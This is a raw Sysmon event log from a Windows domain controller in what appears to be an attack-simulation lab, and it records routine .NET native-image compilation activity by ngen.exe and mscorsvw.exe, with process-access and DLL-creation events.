11241100x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.593{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dac-0\System.DirectoryServices.Protocols.dll2021-01-18 13:47:26.593 10341000x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.265{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.265{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.156{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a0c-0\System.DirectoryServices.AccountManagement.dll2021-01-18 13:47:26.156 10341000x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.421{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.359{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:27.296{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ed8-0\System.Dynamic.dll2021-01-18 13:47:27.296 10341000x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.999{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.999{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.999{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.312{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.187{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:28.078{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\560-0\System.EnterpriseServices.dll2021-01-18 13:47:28.078 11241100x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:28.062{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\560-0\System.EnterpriseServices.Wrapper.dll2021-01-18 13:47:28.062 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.e